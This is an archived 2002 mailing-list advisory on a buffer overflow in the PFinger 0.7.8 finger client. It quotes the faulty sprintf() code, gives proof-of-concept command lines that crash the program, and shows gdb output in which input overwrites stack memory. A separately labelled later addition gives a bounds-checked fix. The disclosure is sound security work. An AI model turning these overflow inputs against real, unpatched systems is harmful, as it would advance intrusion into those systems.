Vulnerability Development mailing list archives

PFinger Buffer Overflow Vulnerability.


From: "dong-h0un U" <xploit () hackermail com>
Date: Tue, 04 Jun 2002 23:14:54 +0800



 PFinger Buffer Overflow Vulnerability.


 * Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)

 * Overview:

 The Pfinger program has an array bounds overflow bug.
 It was found in the client.
 I have not confirmed whether the server side is vulnerable.

 Various similar bugs may exist as well. :-(

 * Description:

 This happens when the array "query" (size 100) overflows.
 Of course, using the -l, -d or -t options causes the same result.
 It happens because sprintf() is used incorrectly. (line 144)

 === pfinger-0.7.8/src/finger.c =================================

 :
 :
 int main( int   argc, char *argv[] )
 {
  int flag;
  char *progname;
  int info = 0;
  char *hostname;
  char query[100]; 
  :
  :
  sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
                  ~~~~~~~~
  DoFinger1(hostname, query);
  optind++;
 }  
 :
 :

 ================================================================
 
 Next, the stack is laid out as follows.

 query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];
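 As an added illustration (not from the original post or from the pfinger project), here is a bounds-checked replacement for the sprintf() call shown above; build_query(), max_user_len() and try_name_len() are hypothetical names, and the 100-byte size mirrors query[100]:

```c
#include <stdio.h>
#include <string.h>

#define QUERY_SIZE 100   /* same size as query[100] in finger.c */

/* Hardened replacement for the sprintf() on line 144 (hypothetical, not
 * the project's code). Builds "<prefix><user>\r\n" into out and refuses
 * any user name that would not fit together with CR, LF and the NUL,
 * instead of writing past the end of the buffer.
 * Returns 0 on success, -1 if the query would be truncated. */
int build_query(char *out, size_t outsz, int info, const char *user)
{
    const char *prefix = info ? "/W_" : "";
    int n = snprintf(out, outsz, "%s%s\r\n", prefix, user);
    /* snprintf() returns the length it wanted to write; a value >= outsz
     * means the output was cut off, so treat it as an error. */
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Longest user name that still fits: outsz minus prefix, CR, LF and NUL. */
size_t max_user_len(size_t outsz, int info)
{
    size_t overhead = (info ? strlen("/W_") : 0) + 3;
    return outsz > overhead ? outsz - overhead : 0;
}

/* Try a constructed name of len 'x' characters (as in the PoC) against a
 * QUERY_SIZE buffer; returns build_query()'s result. */
int try_name_len(int info, size_t len)
{
    char query[QUERY_SIZE];
    char name[256];
    if (len >= sizeof name)
        return -1;
    memset(name, 'x', len);
    name[len] = '\0';
    return build_query(query, sizeof query, info, name);
}

int main(void)
{
    printf("max name with /W_ prefix (info set): %zu\n", max_user_len(QUERY_SIZE, 1));
    printf("0x82 x's accepted? %s\n", try_name_len(1, 0x82) == 0 ? "yes" : "no");
    return 0;
}
```

 A rejected name is reported to the caller instead of silently truncated, so the caller can print an error and exit before DoFinger1() is reached.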

 * Proof of concept:

 [x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ gcc -v
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) 
 [x82@xpl017elz src]$

 - Debugging -

 [x82@xpl017elz src]$ gdb -q ./finger
 (gdb) r -l `perl -e 'print "x"x100'`
 Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
 x"x100'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 
 Program received signal SIGSEGV, Segmentation fault.
 0x4005000a in _ufc_foobar () from /lib/libc.so.6
 (gdb) r -l `perl -e 'print "x"x101'`
 
 Program received signal SIGSEGV, Segmentation fault.
 0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
 (gdb) r -l `perl -e 'print "x"x102'`
 
 Program received signal SIGSEGV, Segmentation fault.
 0xa0d78 in ?? ()
 (gdb)

 (gdb) r -l `perl -e 'print "x"x105'`
 Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
 x"x105'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 
 Program received signal SIGSEGV, Segmentation fault.
 0x400a4b53 in strrchr () from /lib/libc.so.6
 (gdb) where
 #0  0x400a4b53 in strrchr () from /lib/libc.so.6
 #1  0xbffff564 in ?? ()
 #2  0x78787878 in ?? ()
 Cannot access memory at address 0x78787878.
 (gdb)    

 P.S: Sorry for my poor English.

 __
 By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
 E-mail: szoahc () hotmail com
 Home: http://x82.i21c.net

